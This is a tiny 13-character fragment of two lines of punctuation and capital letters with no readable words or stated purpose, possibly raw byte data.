^_ZY[X
ZY[X_^